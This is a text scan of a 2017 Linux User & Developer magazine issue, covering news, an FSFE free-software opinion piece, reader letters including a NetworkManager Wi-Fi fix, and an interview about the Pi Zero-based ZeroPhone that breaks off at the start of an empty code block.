

Linux User & Developer - Issue 184 2017

>_100 WAYS TO
> Become a command line guru in 24 hours
The hero building a $50
phone with the Pi Zero
[Cover artwork: columns of binary code (ASCII for 'Hello World' repeated) interspersed with the phrases IDENTITY THEFT and BANK ACCOUNTS]
Build a Pi piano
Plus! Python &
Minecraft advice
Top pen-testing
Learn how to find the
weak points like a pro
Qubes OS 4
Python IDEs
Ed Snowden’s favourite
distro gets a big update
Get the perfect environment
for your next Python project
> Shell scripting > Learn Java
> Build an Arduino web server
» How I built a robotic
arm for my daughter
» Linux in space
Issue 184
Future Publishing Limited
Quay House, The Ambury,
Bath BA1 1UA
Editor Chris Thornett
Tel 01202 442244
Designer Rosie Webber
Production Editor Phil King
Editorial Director Paul Newman
Senior Art Editor Jo Gulliver
Dan Aldred, Michael Bedford, Joey Bernard, Christian Cawley,
John Gowers, Toni Castillo Girona, Paul O’Brien, Nate Drake,
Jon Masters, Calvin Robinson, Mayank Sharma, Alexander
All copyrights and trademarks are recognised and respected
Media packs are available on request
Commercial Director Clare Dove
Advertising Director Richard Hemmings
01225 687615
Account Director Andrew Tilbury
01225 687144
Account Director Crispin Moller
01225 687335
Linux User & Developer is available for licensing. Contact the
International department to discuss partnership opportunities
International Licensing Director Matt Ellis
Print subscriptions & back issues
Tel 0344 848 2852
International +44 (0) 344 848 2852
Circulation Director Darren Pearce
01202 586200
Head of Production US & UK Mark Constance
Production Project Manager Clare Scott
Advertising Production Manager Joanne Crosby
Digital Editions Controller Jason Hudson
Production Manager Nola Cokely
Finance & Operations Director Angie Lyons-Redman
Creative Director Aaron Asadi
Art & Design Director Ross Andrews
Printed by
Wyndeham Peterborough, Storey’s Bar Road,
Peterborough, Cambridgeshire, PE1 5YS
Distributed by
Marketforce, 5 Churchill Place, Canary Wharf, London, E14 5HU Tel: 0203 787 9060
We are committed to only using magazine paper which is derived
from responsibly managed, certified forestry and chlorine-free
manufacture. The paper in this magazine was sourced and
produced from sustainable managed forests, conforming to strict
environmental and socioeconomic standards. The manufacturing
paper mill holds full FSC (Forest Stewardship Council) certification
and accreditation
All contents © 2017 Future Publishing Limited or published under
licence. All rights reserved. No part of this magazine may be used,
stored, transmitted or reproduced in any way without the prior written
permission of the publisher. Future Publishing Limited (company
number 2008885) is registered in England and Wales. Registered
office: Quay House, The Ambury, Bath BA1 1UA. All information
contained in this publication is for information only and is, as far as we
are aware, correct at the time of going to press. Future cannot accept
any responsibility for errors or inaccuracies in such information. You
are advised to contact manufacturers and retailers directly with regard
to the price of products/services referred to in this publication. Apps
and websites mentioned in this publication are not under our control.
We are not responsible for their contents or any other changes or
updates to them. This magazine is fully independent and not affiliated
in any way with the companies mentioned herein.
If you submit material to us, you warrant that you own the material and/
or have the necessary rights/permissions to supply the material and
you automatically grant Future and its licensees a licence to publish
your submission in whole or in part in any/all issues and/or editions
of publications, in any format published worldwide and on associated
websites, social media channels and associated products. Any material
you submit is sent at your own risk and, although every care is taken,
neither Future nor its employees, agents, subcontractors or licensees
shall be liable for loss or damage. We assume all unsolicited material
is for publication unless otherwise stated, and reserve the right to edit,
amend or adapt all submissions.
ISSN 2041-3270
Welcome to issue 184 of Linux User & Developer
This issue
» 100 ways to master the terminal, p20
» Building a robotic arm for Lorelei, p18
» Take the pen testing challenge, p52
Welcome to the UK and North America’s
favourite Linux and FOSS magazine.
Ever wondered where all your taxes go? Well, in
the UK a chunk of it is merrily flung down a closed
source software hole that public administrations
are destined to fill again and again in a Sisyphean
nightmare (and a government contractor’s
sweetest dream). The Free Software Foundation
Europe is running a campaign to raise awareness
of this waste of taxpayer’s money (see p9 for the
full details). Note: If you’re in the US, consider writing to your representative to ask
them to increase the current requirement to open-source 20% of
new code that’s commissioned.
In the rest of the magazine, we’ve homed in on the command
prompt with our bumper feature on working efficiently in the
terminal (p20), plus John Gowers’s excellent series on shell
scripting (p38). We follow that up with a guide to how pen testers
poke and prod company systems for vulnerabilities and finish our
features with a stimulating read on the fortunes of Linux in space
exploration (p34). As you’ve come to expect, we’ve got plenty of
tutorials too, including something a bit spooky for the end of the
month (p72) and a new series on unusual Arduino projects (p42).
Chris Thornett, Editor
Get in touch with the team:
For the best subscription deal head to:
Save up to 40% on Xmas subs! See page 32 for details
[Feature artwork: binary code (ASCII for 'Hello World' repeated) interspersed with the phrases IDENTITY THEFT, BANK ACCOUNTS and WEAK PASSWORD]
06 News
20 100 Ways to Master
the Terminal
38 Essential Linux
Manjaro-powered Spitfires incoming
and the FSFE hits the campaign trail
10 Letters
Enter the world of readers’ minds
12 Interview
Arsenijs Picugins is close to creating a
phone made using a Pi Zero
16 Kernel Column
The latest news on the Linux kernel
18 Lorelei’s story
The journey of a father and daughter to
crowd source a prosthetic arm
Unlock the power of the terminal with
Neil Bothwick’s guide to many of the
most useful commands and a host
of handy tips and tricks to help your
fingers dance over that keyboard
34 Linux in Space
While Linux is key to much of NASA’s
space exploration, its usage is mainly
confined to computers on Earth, as
Mike Bedford reports
52 Pen-testing
Having nightmares about data
breaches on your systems? Identify
those weak spots by following the
seven stages used by professional
penetration testers
In part three of our Master Shell
Scripting guide, we explore some
more useful commands and learn
sophisticated ways of chaining and
grouping them together
42 Arduino
While Arduinos are mainly used for
controlling hardware, they can do a lot
more – find out how to use an Arduino to
create your own web server which can
double as an IoT device
46 Java
Following on from last issue’s tutorial,
discover how to broadcast your newly
created adventure game across a
network using Java’s fully featured
networking library
Issue 184
October 2017
94 Free downloads
We’ve uploaded a host of
new free and open source
software this month
Practical Pi
Back page
64 Pi project
81 Group test
96 Short story
Powered by the Google AIY Kit, Martin
Mander’s smart intercom answers
questions and follows commands
66 Python & Minecraft
Create a Minecraft chatbot that reads
from a text script
68 Piano HAT passwords
Instead of text passwords, secure your
files with a series of piano notes
72 Ghost detector
A Pi owner’s guide to ghosts and how
to catch them
78 Pythonista’s Razer
Learn how to use Python to perform complex geodesy calculations in the field
This quartet of dedicated Python code
editors enable you to write code with
ease and help to hone your skills, but
which is the best?
What happens if you can’t keep up the repayments on your limb loan?
86 Hardware
Can you really fit a full PC experience
in your jacket pocket? The GPD
Pocket aims to offer just that
88 Distro
Qubes OS 4.0 RC1 adds several
enhancements to the security-centric
distro, but at what cost?
90 Fresh FOSS
OpenShot 2.4 video editor, TruPax 9B
encryption tool, DDRescue-GUI 1.7.1, and
Rambox 0.5.12 unified messaging app
Save up to 40% when you
subscribe! Turn to page 32 for
more information
06 News & Opinion | 10 Letters | 12 Interview | 16 Kernel Column
Station X launches Spitfire laptop
New Linux notebook is finely tuned Manjaro-powered machine
Bletchley Park-based Station X is releasing
a Manjaro special edition version of its
Spitfire Linux laptop. Available from October
with 7th-gen Intel Core i5 or i7 processors, DDR4 RAM (up to 32GB), a maximum of 500GB SSD (with space for a second drive) and Intel 610/620 graphics,
this full HD IPS laptop will retail from £850.
Station X isn’t spinning its own distro,
but is partnering with existing, notable
development teams in the Linux world
to produce tailored distributions, heavily
customised for the target device. There is
also support for 26 other distros.
Station X founder Eddie Vassallo tells us
that “Manjaro Special Edition Spitfire has
been designed from the ground up by the
Manjaro Team – meaning it’s not simply a
preload, but a fully customised experience
from the kernel-level on up. We have been
working with the Manjaro Team since June
to create something very special for the
Manjaro community and the wider Arch
community as a whole.”
This customised experience, says Vassallo,
covers “tweaked kernel settings, power
and performance settings, and even sound
settings to get the most battery life, power,
and experience out of the machine. The
special edition of the Manjaro software will
be maintained and updated via the main
Manjaro repos – so every update will come
to the machine as well.” It doesn’t stop
there, as there will also be software support
and custom assets, “like exclusive themes,
wallpaper, icons and more.”
Other distro teams, such as Debian and
Solus, are working with Station X to develop
custom experiences. It seems likely these will
appear on other devices in Station X’s World
War II aircraft-themed range of computers.
Along with the lightweight Spitfire, its site
lists a Hurricane, Hellcat and Blenheim.
“We’re very careful about the naming,” says
Vassallo, “as we want the characteristics of
those actual period aircraft to reflect the
qualities and attributes of each machine.”
As an example, he cites the Lancaster as Station X’s “heavy bomber”, with dedicated Nvidia graphics up to a GTX 1070.
Above Can the lightweight Spitfire shoot down the
proprietary laptop competition?
None of this would be possible if there
was no market, of course, and Vassallo
is upbeat about the future: “I think we’re
in a bit of Renaissance with both Linux
software and hardware. Linux distribution
and desktop environments have never been
more exciting. I’m so excited for Station
X to join more established providers like
System76 and Purism!”
Learn more at
[Top 10 distro chart: average hits per day, 30 days to 25 September]
This month
Slimline Noodle Pi handheld
computer launches
■ Stable releases (21)
■ In development (6)
Updates were released
for three security-focused distros, which
offer pen-testing tools,
anonymous browsing
and computer
forensics software.
Pi-based Kickstarter goes mainstream
Noodle Pi is a Raspberry Pi Zero-based
portable PC that deftly solves one of
the key problems of the British-built
mini-computer: once components are
connected, things can get a bit messy.
Using a Raspberry Pi Zero, touchscreen
display, 500mAh battery, v2 Camera Module
and unibody case, the Noodle Pi – at its
thinnest just 10mm thick – claims to be the
first modern open handheld computer.
Two versions are available, the $49 DIY kit
with a 3D printed shell and other structural
parts which requires you to buy your own Pi
and other components, and a $199 fully pre-assembled and tested Noodle Pi, in standard
Pi Zero and Pi Zero W flavours.
The result of a successful Kickstarter
campaign, prototyping has taken maker
Ashish Gulhati several years; the arrival of
Pimoroni’s HyperPixel 3.5-inch touchscreen
is the breakthrough that’s made the Noodle
Pi possible. Gulhati tells us how unsuitable
the alternatives were just 12 months ago: “I
tried with various different small displays,
but the ones available in 2016 were pretty
limited in resolution, typically only 320×240
pixels, and had rather poor touch interfaces.
Some of them were also way too big in the
height dimension and needed destructive
modifications to remove tall headers. And
connecting them required soldering.”
As with any Pi computer, the real magic
comes in finding new ways to use the device.
The portability of the Noodle Pi is bound
to inspire a bunch of new uses, something
Gulhati is particularly excited about.
“The possibilities are quite endless! Being
a complete, integrated device, I dare say it
has even more versatility and use cases than
a bare Raspberry Pi board. I’m discovering
new real uses for them every day and it’s
very exciting. I think Noodle Pi will really help
unlock the full potential of the Raspberry Pi.”
One such use is the Noodle Unsnoopable,
which uses the standard Pi Zero to create an
air-gapped portable computer, but Gulhati
has aspirations for Noodle Pi to find its way
to developing countries, with uses ranging
from mobile software development to
wearable projects.
Noodle Pi is currently available to order
Subgraph OS
Debian-based Subgraph OS provides
several security, web anonymity and
hardening features. Among them are a hardened
kernel and application firewall, while all internet traffic
is routed via Tor. Email encryption is supported, while
the file manager strips all metadata.
Parrot Security OS
Based on Debian, Parrot Security OS is
a security-focused distro that bundles
standard features alongside pen testing, cryptography,
privacy, ethical hacking and other utilities. Ships with
the MATE desktop environment.
Kali Linux
Another Debian-based security distro, this
is the most well-known Linux penetration
testing system. Packed with security and forensics
tools, Kali Linux also supports ARM devices and
includes four desktop environments.
Latest distros
Your source of Linux news & views
Can Atari make Linux gaming big?
Legendary game maker identifies a Steam machine-sized hole
As surprises go, news that Atari is
crowdfunding a Linux-based console is a
big one. Since merging with Infogrames in
2008, Atari has released – or licensed – a
number of classic hardware revivals. None
has come close to meeting expectations, but
the Ataribox might just change that.
Running Linux, and featuring a customised
AMD processor with Radeon graphics and
various memory configurations, the (optional)
wood-panelled console evokes memories
of the classic Atari 2600. Only this time,
gaming, media apps and web browsing are
all possible.
But why Linux? Here’s the encouraging
part: “Most TV devices have closed systems
and content stores. Linux lets us be more
open; you can access and customise the
OS, and you can access games you’ve
bought from other content platforms (if
compatible…). This approach means that as well as being a great gaming device, Ataribox is also a full PC experience for the TV, bringing you streaming, applications, social, browsing, music, and more.”
Above The Ataribox will offer backers the option of real wood panelling
The Ataribox project team has a clear
plan, and along with a bunch of pre-installed
classic Atari games, the console will be able
to play games from Steam, and other
digital download services.
Expected to cost $249-$299, the Ataribox
is launching on Indiegogo soon and special
editions, early access bonuses and more are
being hinted at by the company.
In a world where the Steam machines
remain largely unknown, and Android console
gaming has inexplicably failed to make its
mark, history is stacked against the Ataribox,
but we’ll have to wait and see.
GNOME and Plasma back Purism Linux phone
Librem 5 smartphone attracts big-name support
Following news of the Purism Librem 5
phone, two big hitters in the open source
Linux world have announced their intention
to get involved.
First comes the partnership between
Purism and KDE Plasma in a venture that
will see a pooling of resources to bring the
Plasma Mobile platform to the Librem 5.
This is an ideal team-up: KDE Plasma Mobile
will gain some up-to-date hardware to base
its operating system on, while Purism is set
to fulfil its goal of developing a mobile OS
with full encryption. But does this mean
that Plasma Mobile will be the default OS
on the Librem 5? Time will tell, but the initial
announcement indicated that a GNOME UI
would be employed.
Unsurprisingly, the second name to get
involved is the GNOME Foundation, which
has expressed an interest “in advancing
[Librem 5] as a GNOME/GTK phone device.
The GNOME Foundation is committed to
partnering with Purism to create hackfests,
tools, emulators, and build awareness that
surround moving GNOME/GTK onto the
Librem 5 phone.”
However, the Foundation’s involvement
with Librem 5 comes at a price: Purism’s
crowdfunder must reach its $1.5 million goal
by mid-October. If successful, GNOME will
get involved to help “enhance GNOME Shell
and general performance of the system with
Purism to enable features on the Librem 5.”
With a focus on security, privacy and
freedom, there’s a feeling that the Librem 5
is something that just has to happen. Will
other big names collaborate on producing
a workable mobile Linux operating system
before the crowdfunder goal is reached?
Public Money? Public Code!
The Free Software Foundation Europe’s
‘Public Money? Public Code!’ campaign
wants to curb the trend for using closed
software and proposes that all software
developed using public funds be made publicly
available as free software.
The campaign is designed to inform the general public that there are several good reasons for this – that, despite the fact we are paying for closed software now, we are not benefiting from it. Quite the contrary:
often we are suffering because of it, as we are paying
more for useless reinventions of the wheel every time
a public administration needs a piece of software that
another already has, but decided not to share.
As a counterpoint to having to recreate (and pay for)
closed source software again and again, we point to
success stories in FLOSS, like that of FixMyStreet. The
FixMyStreet project is an unassuming piece of software
used to report problems like potholes, broken pavements
or rubbish on the street. It’s used by town halls on five
continents – all because its code can be shared.
But explaining the evils of proprietary software to
the general public is often hard. Frequently we, the
free software advocates, come across with ineffectual
arguments that seem to frame the issue as an us-versus-them paradigm. Such is the case when we start
waffling on about vendor lock-in. To the casual tech
user, it is not immediately apparent why this is a bad
thing. Because of how the software market has evolved,
the current mindset is that of course you should resort
to the original manufacturer for repairs, corrections
and upgrades. However, the problems arise when the
provider will not help you and nobody else can, and they
only become apparent when they happen, and then the
evidence seems anecdotal. Hence, we had to go the
extra mile in this campaign and reason every step of why
relying on a single provider for public institutions is a bad idea.
If arguing about vendor lock-in looks like the rantings
of a disgruntled loser that never made it in the market
(although we all know that both parts of that sentence
are untrue), mentioning all the security problems,
unintended and otherwise, that come with proprietary
software sounds paranoid to a tinfoil-hat level. But we
can point at the Wannacry debacle, which came about
because the British NHS relies on proprietary software
working on obsolete platforms that it could not afford
to upgrade. There’s also Spain’s Lexnet, a poster child of
what a public software project should not look like. This
legal service was blown wide open, allowing everybody
to access private and confidential information related to
every court case being held in Spain. As for proprietary
software deliberately syphoning information to its parent
companies and security agencies of foreign countries…
well, that has become the unfortunate norm.
Despite all the evidence; despite every argument
against spending public funds on the development of
proprietary software, here we are: public administrations
still do it, the general public is as in the dark as ever
about how their tax money is squandered, and politicians
are either clueless or don’t care. That’s why a campaign
like PM?PC! is necessary.
As I write this, the German elections are in full swing. At this point the FSFE has made sure that every candidate to the Bundestag has received a copy of the PM?PC! open letter. The letter has now been signed by over 11,000 people and has been endorsed by more than 70 organisations. It lays out in no uncertain terms why public money should be spent on free and open public code.
Paul Brown/FSFE CC BY-SA
Most public administrations are spending our taxes on developing proprietary software. Paul Brown hopes you agree that this is a terrible idea
Paul Brown
is the Communications Officer for KDE and the Free Software Foundation Europe. He’s been writing about and defending free software for over 20 years.
Before the elections to the European Parliament of
2019, all the wannabe MPs will also get the letter. We are
also encouraging sympathetic activists all over Europe to
use it to try to convince lawmakers in their own countries
to pass legislation that prioritises spending public funds
on developing software in the open. The more people
that support this cause, the more pressure we can exert.
That is why it is important you sign the letter too. It only takes a few minutes and you’ll be helping convince institutions that Public Money should be spent on Public Code.
Your letters
Questions and opinions about the mag, Linux and open source
Got something to
tell us or a burning
question you
need answered?
Email us on
Above Bob doesn’t like American English, but he needn’t feel that he should suffer as most contemporary Linux distributions, like Manjaro Linux, offer UK English – and US English and Canadian English for that matter – as an installation option
I’m English! Cor
blimey, guv’nor
Increase the popularity of Linux – remove Windows
XP everywhere! I have played with Linux for at least ten
years, [yet] every attempt at dual-booting Windows and
Linux has ended in disaster. Possibly my own fault but
who knows? I have participated in LUGs – p’d off with
the arrogant persistence that you don’t know what you
are doing till you use the command line. I’ve not used a
command line since CP/M. And yes, I did program in CP/M. I’ve still got it somewhere on 10-inch floppies.
Now, I am English, my ’pooter language is British
English. Only one recent distro loaded from live ISO
and was 90% usable instantly – Mageia. Every other
distro presumes I am US American and uses that faulty
version of the English language. An XP user prepared to
give Linux a whirl will go no further. Windows, after all,
picks up largely who and what you are and will give you a
one-click language setting for starters. Now, I know there
are a lot of Windows users who don’t know that there is a
difference with English versions – I have been tempted to
use Irish English myself.
One of my granddaughters had her English homework
corrected by a teacher who struck out some of her
words as misspelled and substituted the US spellings.
I had a word with the school head who immediately got
the IT manager to check all the school systems for the
correct language.
You clever clogs who live and breathe Linux may
be able to quickly sort this problem out, but a newbie
won’t. Please, can we have UK market Linux distros with
default British language and keyboards and no need for
the command line? Yes, there is a ghost of MS-DOS still
in Windows, but updating to the latest Windows version
doesn’t require the new user to know anything about it!
By the way, my currently (still) installed Linux is the
lovely little Puppy! What a pet. Boots from external HDD.
Bob Dove
Chris: Thanks for your email, Bob. I agree we need
to remove as many barriers from new Linux users as
possible, but American English is ‘faulty’? Seems a little
harsh on our American friends, but I do feel your pain. If
you don’t want American English foisted on you, it can
be grating to see it taunting you from every interface.
However, you don’t need to use the command line to
select the right language at install on many modern
distros now. In Ubuntu, for instance, you can choose
English (UK) when you progress through the installation
wizard. If you look on the Ubuntu flavours page, it
states that the standard Ubuntu images only support
a few languages, but that list does include ‘English
(US, UK, AU)’. My current pet peeve is that the install
of LibreOffice on the office machines has the UI locked
down to English (US), which means I can’t install language
packs to rectify the problem. The sight of ‘color’ instead
of ‘colour’ may be upsetting, but I have to remind myself
that language is a mutating creature and I’m getting
upset about the American spelling of an English word
with French origins.
Wi-Fi woes
My Ubuntu 17.04 isn’t working in Wi-Fi – can anyone give
me suggestions?
Yeshi Jinsel via @LinuxUserMag on Twitter
Chris: There could be so many answers to this as we
don’t know enough about Jinsel’s system, but given
that this was a fresh install, it’s likely the issue with
NetworkManager that was discovered in the initial
release (although some users are suggesting that it’s
still a problem in betas of 17.10). Personally, I found I had
Wi-Fi problems in 17.04 initially, but they went away after
an update. However, the original issue was that a new
release of NetworkManager (1.4.0) added a new ‘security
feature’ that randomly changed the current MAC address
of your Ethernet or Wi-Fi card, which caused connection
issues. The workaround, found by an OMG! Ubuntu user,
is to edit the /etc/NetworkManager/NetworkManager.conf file and add the following entry:
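The entry itself hasn’t survived in this scan. The workaround that circulated at the time – reproduced here from the widely reported fix rather than from the printed page – was to add a [device] section that switches off MAC address randomisation during Wi-Fi scanning:

```ini
# /etc/NetworkManager/NetworkManager.conf
# Stops NetworkManager 1.4.0 randomising your Wi-Fi card's MAC
# address while scanning, which broke some connections
[device]
wifi.scan-rand-mac-address=no
```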
Above There was a workaround for the Wi-Fi problems in Ubuntu
17.04 caused by a new ‘feature’ in NetworkManager, but it should be
fixed now and not an issue in 17.10
A quick restart of the NetworkManager service (for example, sudo systemctl restart NetworkManager) is required after changing the config file. Good luck!
Project ZeroPhone
Undaunted by the scale of the endeavour, Arsenijs Picugins is close to creating a
kit that will enable other enthusiasts to build their own mobile phone constructed
from a Pi Zero, custom PCB designs and components costing $50
Arsenijs Picugins
is 22 years old and the
creator of ZeroPhone.
He’s taken time out from
his university studies to
concentrate on projects like
the phone and helps manage
the Make Riga Hackerspace.
The growth of open hardware is undeniable and
we’ve had high-profile smartphone projects
appearing such as Purism’s security- and privacy-focused Librem 5 smartphone (shop/librem-5). The ZeroPhone project led by
Arsenijs Picugins is no less ambitious but much less
expensive. As we started the interview we noted,
with some irony, his apologies for the intermittent
mobile connection as he’s taking a break away from
his home city of Riga to enjoy the countryside of
neighbouring Lithuania.
While you’ll be able to make calls and send SMS
with Picugins’ ZeroPhone, it isn’t as cutting edge as
Purism’s smartphone. Instead, it sits firmly in the
middle of the makery and hacking spirit that powers
the big budget open hardware projects. The phone’s
design is pragmatic, with its use of the Raspberry
Pi Zero, surface-mounted switches and 1.3-inch
128×64 monochrome OLED screen, but it’s a clever
approach to a DIY Pi phone and Picugins, a 22-year-old student from Latvia, is hoping other enthusiasts
will snap it up as a kit when he launches a crowdfund
to cover manufacturing costs.
In its current form, the ZeroPhone is a Raspberry
Pi Zero in a ‘PCB sandwich’ that has Wi-Fi (using
an ESP8266), HDMI and audio outputs, a free
full-sized USB host port and a micro-USB port for
charging. One feature that has caught the attention
of hardware hackers is the use of GPIO expansion
headers for hardware add-ons and customisation; Picugins is still working on a 3G modem (see p15). On
the coding side, it uses Python and has a UI toolkit
designed to make app development quick and easy.
The big question is can you assemble a phone
from easily available parts, using cheap boards
running Linux?
Well, I’m making sure it’s the case. Right now there
are two people who are trying to assemble the
phone independently. It’s a slow project and I don’t
yet have all the assembly instructions published
and polished, which is one of the things that I’m
trying to finish for the Hackaday Prize deadline
that’s in 20 days. But it’s one of the selling points
from the beginning, as it’s possible. You can get
components that make up a phone together, unite
those components together and just assemble the
whole thing and put some solder on it. This is pretty
much what manufacturers do [...]. Of course, they
assemble the phones by using a lot of automation.
Intel inside Intel
So, what is the Intel Management Engine, and why might users want to deactivate it?
Imagine if there was a ‘black box’ operating
at the lowest level of your Linux machine
with control over every part of the system
and you couldn’t access this box or control
it. Well, if you have an Intel CPU that’s what
you’ve got and it’s called Intel Management
Engine (ME). ME is an independent processor
core that’s embedded inside the Multi-Chip
Package (MCP) on Intel CPUs. This operates
independently of the main processor, the BIOS
and your operating system, but it interacts
with the BIOS and OS kernel.
Recently, there were vulnerabilities found
in some Active Management Technology
(AMT) modules which exist inside some Intel
Management Engines. These AMT modules
(part of what Intel brands as ‘vPro’) are used
for remote out-of-band repair work and
can be used to monitor, maintain, update
and upgrade a computer. This meant that
many machines with Intel CPUs, mostly
being used in an enterprise setting, were
disastrously vulnerable to remote and local
attack. Fortunately, there was a way to
disable AMT, but deactivating or limiting MEs
generally is complex, which is why Purism,
as a manufacturer, has had more success by
tackling it with a combination of “hardware
selection, hardware configuration, hardware
fuses and firmware”.
Do you have to be reasonably competent at
soldering to do this?
Yes, I don’t think assembling this phone is suitable
as a first-time project in soldering. I think it’s a
second- or third-time project. Also, a large part of
soldering can be automated [Picugins has access
to a Pick&Place machine in the Riga hackerspace].
So I can provide kits with the hard-to-solder parts
already assembled. Even then, without the hard-to-solder
parts already on, people can still assemble it
themselves – I just have to simplify the process.
For example, there’s a GitHub (ZeroPhone) where
all the schematics and board files
are available. One example of hard-to-solder parts
that are easy to automate are buttons – you don’t
have to sell just the keypad and buttons separately. I
can just solder them on and sell it to people like that
in the form of kits. The parts that are either hard or
expensive to automate, this is something that would
be economical and reasonable to let the recipient
do, because otherwise I’m afraid it will drive the
price point too high.
So you’re keen to keep it around $50 for all the bits?
For all the bits, yes. But that’s just how much the bits
cost – the bill of materials. Right now it’s around $40 and
I might add $5 of components, but then if I’m selling
kits myself and have to package them, test them and
ship them, then the kits aren’t going to cost $50. But
I want to stay below at least the $100 mark, because
it’s a psychological limit above which it’s harder to
justify spending money on something.
For the phone itself, what’s the situation with
software? What OS are you using?
Above With the SPI flash chip and I2C
EEPROM programming add-on board, the
ZeroPhone can help re-flash the BIOS on an
x86 device or fix broken router firmware
So there’s an operating system which is Raspbian
Linux. But Linux itself works great, because it’s on
a Raspberry Pi. Among the things the Raspberry Pi is
famous for is software support. It’s really great,
even though there are closed source bits, which are
sometimes problematic. I think it’s one of the best
for support right now, when speaking about single-board
computers. They have the resources and take
user feedback into account.
So it’ll be running a cut-down version of the
Raspbian distribution?
It’s without the desktop environment. There’s
a Raspbian Lite distribution and that’s what
I’m using and it makes sense to run something
without a desktop (by default) on a small phone
like this. Speaking about the UI, right now it’s
Python powered. There are no X server drivers, or
something like GNOME native Linux support for it,
so it’s a tad problematic, but there still isn’t a good
UI framework for Linux phones with small screens.
There are all types of Android frameworks, but I
don’t know of any UI framework that I could use even
if the screen had a frame buffer, so there just isn’t
such a thing except for what I’ve developed. So I had
the option of using something of my own or using
some kind of library for the screen and writing all
the applications myself and not use all the terminal
utilities that are available or I could spend a lot of
time to make some kind of frame buffer bindings
and then put up with the illegibility of the console
because it doesn’t have enough characters – it can
only fit around 24 by 8 characters on screen,
when the standard is 80x24 and some apps require
that. So I had to roll something of my own. [This
interface was based on one of Picugins’s earlier
Hackaday projects called pyLCI – see
Do you think down the line, you might go for a
higher-resolution screen?
Like a touchscreen? Looking at the situation with
screens that you could connect to the Raspberry Pi,
this is one of the most reasonable solutions,
as the interfaces that the Raspberry Pi provides do not
give that much leeway to work with. For example,
there is an SPI interface, but the refresh rate is
not going to be good and there’s not going to be
hardware acceleration. There’s HDMI, but screens
that use HDMI usually consume plenty of power.
That would also complicate the hardware design,
because HDMI lines require a lot of attention
because of the requirements of the PCB layout.
There’s also DSI interface: it’s the interface to go
[with] if you want to make a portable device with a
large screen, but it’s neither accessible on the Pi
Zero which I’m using, [nor] is it documented. They’ve
not documented that interface and do not provide an
API to connect your own screens.
I have one interface that I can reasonably use
for a mobile and that’s SPI, but the refresh rate is
not that good for large screens. You can have SPI
screens that are well built, but you’re basically
limited to Adafruit or Sparkfun or some Waveshare
product, but I didn’t want to specifically limit it to
that selection as it’s not that accessible to me. They
really don’t have much interest here.
You’re saying distribution is limited?
Yes, exactly. Also, this small screen is an interesting
limitation. It’s an interesting mental exercise thinking
about how to fit everything into such a small screen;
make the interface usable and use physical buttons
to a large extent [...]. It works and it’s still cheap and
it’s also a simple way.
In one of your posts somebody was looking at
coming up with a different way to work with the
UI? You’ve got people wanting to help collaborate?
Yes, absolutely, people have helped. There was a small
roadblock on my side because I couldn’t send out
hardware to contributors for quite some time, due
to hardware problems I was solving. But now I’m
sending out hardware that people can work with.
For example, I’ve sent hardware to one guy who is
interested in making Wayland run and he’s done
some software demos of this small screen, e.g., this
128×64 pixels viewport working with OpenGL.
That’s exciting – how is the chassis design going?
I’ve sent out hardware to case designer volunteers.
I’d really like to outsource. I’m mostly feeling
overwhelmed because there’s so much to do, so
people have been really interested in making a case
[for the phone]. So I’ve sent out three phones and I’m
going to send out three more. I’ll continue sending
them out to those people that want to help. I don’t
really have that much experience in 3D modelling.
That’s why there’s not a case yet, as I can’t make it
myself. I’d need to spend even more time learning
how to do it myself.
How is the crowdfunding project progressing?
It’s not quite ready yet. I still have the most important
part, the financials, to prepare. And there’s
also the fact I want to make a stable hardware
revision, which will be the next revision, so that I can
account for the bill of materials changes that might
be necessary, and make sure they don’t impact the
manufacturing in any significant way.
That’s been a blocker for the last five months.
It’s been getting ridiculous even for me, but I want
to make sure everything is going to be okay as even
though I have people who can give me advice, I really
want to make this project succeed and not stumble
upon something unforeseen. So I’m making sure
that the crowdfunder is as good as possible.
I know for example that this revision needs some
more self-assembly instructions and I need to get
more feedback and check the financials so there’s
Add-ons for free interfaces
The ZeroPhone has a number of unused hardware interfaces, including SPI, I2C
and I2S, which Picugins has used for optional add-on boards. So far he’s worked
on an SPI flash chip board (pictured, in the Intel Inside Intel box), which can be
used to, for instance, perform BIOS reflashing. He’s also added a USB-UART on the
micro-USB port that can be used for debugging as well as charging the phone and
is developing a microphone board that uses the I2S interface (although Picugins
says this board will stick out a little due to the way it’s mounted). He’s even made an
infrared receiver and transmitter board, which he admits has limited use (unless
you want to annoy the regulars in your local boozer by changing the channel on their
old pub telly). This board plugs into a 5-pin socket on the top of the ZeroPhone and
adds IR LEDs and an IR receiver.
Above Picugins has developed a number of add-on boards
using the free interfaces on the Pi Zero. He’s hoping to
crowdfund as many mods as possible
no chance of me running out of budget during
the manufacturing. So, yes, it’s mostly about me
being nervous.
There are two people that I know of that are
already trying to assemble the current revision, but
there are also six people that want to assemble the
next revision. I’ve already bought parts for them, now
I’m working on the PCB design. So, self-assembly is
a real priority. After all, it’s something nobody really
offers, but it’s completely possible to achieve.
Have you managed to get the ZeroPhone to
support 3G?
It basically needs the 2G modem replaced with
a 3G one and it’s possible, but I’m constrained by the
dimensions of the 2G modem that I’m using, so
I’m trying to design around those dimensions. Two
weeks ago, when I was finishing the 3G upgrade
board, I ran into limitations, so I’m thinking about a
way around them by either increasing the vertical
dimensions of the phone or basically having a part
that sticks out a little. I’m waiting for a solution to
come to me while I have PCBs to make for the next
revision. But it’s definitely one of the priorities for
the crowdfunding.
There’s a survey for those who want to get a
ZeroPhone or are interested in the project, so I’ve
been collecting replies and I think 3G is the most
requested feature. So I have to have 3G to offer for
the crowdfunder or it will be a serious disadvantage.
You also have add-ons for the ZeroPhone. Can you
tell us about those?
I’m using some of the interfaces that the Raspberry
Pi provides, but there are a lot of interfaces that
are free as well. I’ve connected those interfaces to
expansion ports on the sides of the ZeroPhone and
I thought why not have some boards that would
simplify tasks like programming and working with
flash chips? Then I understood, for example, I could
design a board that has a circuit for a laptop BIOS
chip and use ZeroPhone to reprogram the BIOS of
a laptop in order to, for example, deactivate Intel
Management Engine (see Intel Inside Intel box, p13)
or something like that.
I can desolder the BIOS chip from my laptop;
I can plug it into a ZeroPhone add-on board and
use available BIOS chip programming tools in
order to read the BIOS contents, modify them
using, for example, ME Cleaner, a utility from
Purism. I can modify the BIOS image and flash
it back into the laptop and I’m going to have a
management-disabled laptop. This has been one of
my side projects and I’ve come to understand that
ZeroPhone is also quite a powerful hardware hacking
platform and those expansion ports will make it
even better at it, and it’s something I can do to make
hardware hacking more user-friendly.
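The workflow described above can be sketched from the command line. The flashrom device path here is a hypothetical SPI-programmer setup, not the ZeroPhone board's actual wiring, so treat it as an illustration only and check your own hardware before writing anything to a real BIOS chip:

```shell
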